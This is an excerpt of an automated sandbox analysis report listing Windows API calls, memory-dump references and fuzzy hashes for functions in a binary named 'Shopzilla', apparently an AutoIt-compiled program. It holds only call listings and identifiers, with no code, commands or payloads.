                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: f16fbb9f5c951face7d75bf80871f4897a3db7fccde028eb42f169077bd550fd
                                              • Instruction ID: 204962af16682e05e9ed2c1c724052e29cb7a74cb11e414da062ce37896a145a
                                              • Opcode Fuzzy Hash: f16fbb9f5c951face7d75bf80871f4897a3db7fccde028eb42f169077bd550fd
                                              • Instruction Fuzzy Hash: DC1143B9D00209EFDB41CF98D885AEEBBF9FB48311F104156E914E3614D735AA658F50
                                              APIs
                                              • _memset.LIBCMT ref: 00C2BA31
                                              • _memset.LIBCMT ref: 00C2BA40
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C67F20,00C67F64), ref: 00C2BA6F
                                              • CloseHandle.KERNEL32 ref: 00C2BA81
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memset$CloseCreateHandleProcess
                                              • String ID:
                                              • API String ID: 3277943733-0
                                              • Opcode ID: ca9dc4ccb5407790f440b2d2cb9fd268ccd7c7f0c384dabfd85e14ee9e648a10
                                              • Instruction ID: b666fbc4944e05cd46b49bc54aa0b8c372134206ec12b07242c608bae5baa0d2
                                              • Opcode Fuzzy Hash: ca9dc4ccb5407790f440b2d2cb9fd268ccd7c7f0c384dabfd85e14ee9e648a10
                                              • Instruction Fuzzy Hash: 10F082F2558304BBF66067E2AC55FBF3A5CEB08758F000964FA08D51A2D7F55C1087AA
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 00C0700E
                                                • Part of subcall function 00C07AEC: _memset.LIBCMT ref: 00C07B21
                                              • _memmove.LIBCMT ref: 00C07031
                                              • _memset.LIBCMT ref: 00C0703E
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00C0704E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                              • String ID:
                                              • API String ID: 48991266-0
                                              • Opcode ID: 3d8ddb8cd52f0dbadf1edb1e904fbce78d8fa0738e59bfe279b5e5aaa3abb6c2
                                              • Instruction ID: 495ec4aa03887872c3ae1024980ec3dc224bfcb662b34dbb1f93d7325cf3450a
                                              • Opcode Fuzzy Hash: 3d8ddb8cd52f0dbadf1edb1e904fbce78d8fa0738e59bfe279b5e5aaa3abb6c2
                                              • Instruction Fuzzy Hash: E8F05476200104ABCF416F55DC85F4ABB69EF45320F08C095FE085F267C771A915DBB4
                                              APIs
                                                • Part of subcall function 00BA16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BA1729
                                                • Part of subcall function 00BA16CF: SelectObject.GDI32(?,00000000), ref: 00BA1738
                                                • Part of subcall function 00BA16CF: BeginPath.GDI32(?), ref: 00BA174F
                                                • Part of subcall function 00BA16CF: SelectObject.GDI32(?,00000000), ref: 00BA1778
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C2C163
                                              • LineTo.GDI32(00000000,?,?), ref: 00C2C170
                                              • EndPath.GDI32(00000000), ref: 00C2C180
                                              • StrokePath.GDI32(00000000), ref: 00C2C18E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                              • String ID:
                                              • API String ID: 1539411459-0
                                              • Opcode ID: 8d4909f3b11b27d5364e96215616d4b65baf29900b7163abff915d6d0065a2af
                                              • Instruction ID: f398e3a175b5e7d3882e57b463cc16f710c35af4fff9d6a88dbab253f8754de1
                                              • Opcode Fuzzy Hash: 8d4909f3b11b27d5364e96215616d4b65baf29900b7163abff915d6d0065a2af
                                              • Instruction Fuzzy Hash: 12F08232005269BBDB136F65AC0EFCE3F59AF0A310F144140FA11650E2C7B55661DFA5
                                              APIs
                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00BFA852
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BFA865
                                              • GetCurrentThreadId.KERNEL32 ref: 00BFA86C
                                              • AttachThreadInput.USER32(00000000), ref: 00BFA873
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                              • String ID:
                                              • API String ID: 2710830443-0
                                              • Opcode ID: 73c74e77584dd8c2d5edcbe600c3b6fbb8543701c11057fce21cac7eefddf62b
                                              • Instruction ID: f028897cc15f19b4a9c288a94867fa5f51a8164e97c0a8a4e0a98ae3d0d951d1
                                              • Opcode Fuzzy Hash: 73c74e77584dd8c2d5edcbe600c3b6fbb8543701c11057fce21cac7eefddf62b
                                              • Instruction Fuzzy Hash: A3E0397210122CBBEB201BA29C0DFEB3F6CEF11BA1F108060FA0986050C7B18955CBA0
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00BA260D
                                              • SetTextColor.GDI32(?,000000FF), ref: 00BA2617
                                              • SetBkMode.GDI32(?,00000001), ref: 00BA262C
                                              • GetStockObject.GDI32(00000005), ref: 00BA2634
                                              • GetWindowDC.USER32(?,00000000), ref: 00BDC0F4
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BDC101
                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00BDC11A
                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00BDC133
                                              • GetPixel.GDI32(00000000,?,?), ref: 00BDC153
                                              • ReleaseDC.USER32(?,00000000), ref: 00BDC15E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                              • String ID:
                                              • API String ID: 1946975507-0
                                              • Opcode ID: 8aa2bd490667938834a210123adc512f61b3a775693c1aac2021f131097867df
                                              • Instruction ID: b0a52f0693cecc1d8ca3dd75157e44a5e868ae61deb56faffa47a6a7136320b8
                                              • Opcode Fuzzy Hash: 8aa2bd490667938834a210123adc512f61b3a775693c1aac2021f131097867df
                                              • Instruction Fuzzy Hash: 27E06D32514244ABDB225F68AC09BEC7F65EB06332F2483A6FA79580E2C7714980DB12
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00BF911C
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00BF8CE7), ref: 00BF9123
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00BF8CE7), ref: 00BF9130
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00BF8CE7), ref: 00BF9137
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: 9dfebd0ca80953329fff2992e76ca5b8e516c2275489a40f73ddcebc11c7b142
                                              • Instruction ID: e05ea4ffe7efc86df72c989a66420e6d928bb94630c2fd7547ee5fbe1937b3ff
                                              • Opcode Fuzzy Hash: 9dfebd0ca80953329fff2992e76ca5b8e516c2275489a40f73ddcebc11c7b142
                                              • Instruction Fuzzy Hash: 59E08633611211ABD7601FB5AE0CB6B3BACDF55791F204868B245DA050E6348549CB50
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00BE05A9
                                              • GetDC.USER32(00000000), ref: 00BE05B3
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BE05D3
                                              • ReleaseDC.USER32(?), ref: 00BE05F4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: 44354e8f30c3e15130983cfdd088a088ac6a257de54ec27ccd8816fa19f92ec3
                                              • Instruction ID: 4204b7948d34e86d09c4f98df78c43dbd6f32003278a1825a59953a591f3df5f
                                              • Opcode Fuzzy Hash: 44354e8f30c3e15130983cfdd088a088ac6a257de54ec27ccd8816fa19f92ec3
                                              • Instruction Fuzzy Hash: 85E01AB2814204EFCB019F60D859B9D7BF5EB9C310F208055FC5AA7210CB7885519F50
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00BE05BD
                                              • GetDC.USER32(00000000), ref: 00BE05C7
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BE05D3
                                              • ReleaseDC.USER32(?), ref: 00BE05F4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: 31d8f8e08f1cb883aaad78a6058cc5d5dfcd7666c74631ffa73ec290a6daf54a
                                              • Instruction ID: 8d63de6dca9bd138eeddec8ba5d5a6dc344f85d21722da54f2e8e23e70e24ca2
                                              • Opcode Fuzzy Hash: 31d8f8e08f1cb883aaad78a6058cc5d5dfcd7666c74631ffa73ec290a6daf54a
                                              • Instruction Fuzzy Hash: 0CE012B2814204AFCB019FB0D829B9EBBF5AB8C310F208018FD5AA7210CB7895518F50
                                              APIs
                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00BFBE3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ContainedObject
                                              • String ID: AutoIt3GUI$Container
                                              • API String ID: 3565006973-3941886329
                                              • Opcode ID: 8345f6ba2ce6e19d68d8bc879bda2afd8694ed32065f15075246f7b3e731dc87
                                              • Instruction ID: 3460913cc486d57c56c4c2790c538eb033232fd3008a3c2f344822e2ece18e52
                                              • Opcode Fuzzy Hash: 8345f6ba2ce6e19d68d8bc879bda2afd8694ed32065f15075246f7b3e731dc87
                                              • Instruction Fuzzy Hash: D0914C742006059FDB54DF24C884F6ABBF9FF48710F1089ADEA0ADB691DB71E849CB51
                                              APIs
                                                • Part of subcall function 00BB436A: _wcscpy.LIBCMT ref: 00BB438D
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                              • __wcsnicmp.LIBCMT ref: 00C0B4DD
                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C0B5A6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                              • String ID: LPT
                                              • API String ID: 3222508074-1350329615
                                              • Opcode ID: 5df5384693e43a0a39fe8db6840b23000cef35d6e241a2fb6fbc20171fb278b0
                                              • Instruction ID: 78b8f31f155ee5daa4f6145b8999a60f55b27af1f6e444080cc777358cc234e1
                                              • Opcode Fuzzy Hash: 5df5384693e43a0a39fe8db6840b23000cef35d6e241a2fb6fbc20171fb278b0
                                              • Instruction Fuzzy Hash: 3761A175A04219AFCB18EF94C891EAEB7F4EF49710F1440A9F956AB291DB70AE40CB50
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 00BAE01E
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00BAE037
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: 0b041405d64594d63a0a876f438fade47d0307ef8c92e1bdbcaf60c415cb678f
                                              • Instruction ID: c53424b2805da5737bd8b3fd1635dac770c700e8b6fbede4c7c75cc6323e5429
                                              • Opcode Fuzzy Hash: 0b041405d64594d63a0a876f438fade47d0307ef8c92e1bdbcaf60c415cb678f
                                              • Instruction Fuzzy Hash: B95158724087449BE320AF50E886BAFBBE8FBC5314F41889DF1D8411A1DBB19929CB16
                                              APIs
                                              • _memset.LIBCMT ref: 00C12A4E
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C12A84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CrackInternet_memset
                                              • String ID: |
                                              • API String ID: 1413715105-2343686810
                                              • Opcode ID: 6e0cb90d01cabefd4eba5e71487849a191086dea4d717c2b87598946dbef08fa
                                              • Instruction ID: 5d7458df6b0f0fd13a32d504d872d8381f36af9729ca3f74d38fe48106dcadfd
                                              • Opcode Fuzzy Hash: 6e0cb90d01cabefd4eba5e71487849a191086dea4d717c2b87598946dbef08fa
                                              • Instruction Fuzzy Hash: FE315971C00219ABCF01EFA5CC85AEEBFF8FF08300F100069F815A6162EB719A56DB60
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00C26F04
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C26F40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: 1a5a4a9b81c260585af68ee2a20e3f11c3ea8191d83e791349fb2ce16db8452b
                                              • Instruction ID: fd48d5ada945a9ab7aa56d537c0dffe20b4546c60838ad3d915306cb0297b5af
                                              • Opcode Fuzzy Hash: 1a5a4a9b81c260585af68ee2a20e3f11c3ea8191d83e791349fb2ce16db8452b
                                              • Instruction Fuzzy Hash: E0319C72110614AEEB109F78EC81BFB73B9FF88724F108619F9A597190DB71AD81DB60
                                              APIs
                                              • _memset.LIBCMT ref: 00C02F24
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C02F5F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 3c35455bce82e8c47a4f71eeefbe90632c6d8ef3fb07db6916bd2a6bf1f2cfd0
                                              • Instruction ID: ba3c9196eb143e43f3cd956c3a5e9b043ef8624e9d584b4a8cb00f1af896e48b
                                              • Opcode Fuzzy Hash: 3c35455bce82e8c47a4f71eeefbe90632c6d8ef3fb07db6916bd2a6bf1f2cfd0
                                              • Instruction Fuzzy Hash: 7B31C3326002169BEB259F99C889BAEFBF8EF45390F14001DE995961E0D7709B44DB51
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C26B4E
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C26B59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 1ff8f2fb32949671b00dfe368833505db7c2491f7dcece48b15df0c34d97e135
                                              • Instruction ID: 3e60094de4a842d795d4765964ef5ab32ed7d450b0ca182dd506e0049331935a
                                              • Opcode Fuzzy Hash: 1ff8f2fb32949671b00dfe368833505db7c2491f7dcece48b15df0c34d97e135
                                              • Instruction Fuzzy Hash: 9811B271300219AFEF119F14EC91FBB376AEB883A4F204125F928D7290D6719D51A770
                                              APIs
                                                • Part of subcall function 00BA2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BA214F
                                                • Part of subcall function 00BA2111: GetStockObject.GDI32(00000011), ref: 00BA2163
                                                • Part of subcall function 00BA2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA216D
                                              • GetWindowRect.USER32(00000000,?), ref: 00C2705E
                                              • GetSysColor.USER32(00000012), ref: 00C27078
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 053c6844a8841d33f745082c5a5ecf3645941bf9fc09629487f2ca3ebd488935
                                              • Instruction ID: 90e4c30116db3209c4af3c0fca13fa2f8d36bc4957a630c3fcffcb8ac11fc2ee
                                              • Opcode Fuzzy Hash: 053c6844a8841d33f745082c5a5ecf3645941bf9fc09629487f2ca3ebd488935
                                              • Instruction Fuzzy Hash: 2121177261421AAFDB04DFB8DC86AEA7BA8FB08314F104659FE55E2240E635E854DB50
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00C26D8F
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C26D9E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
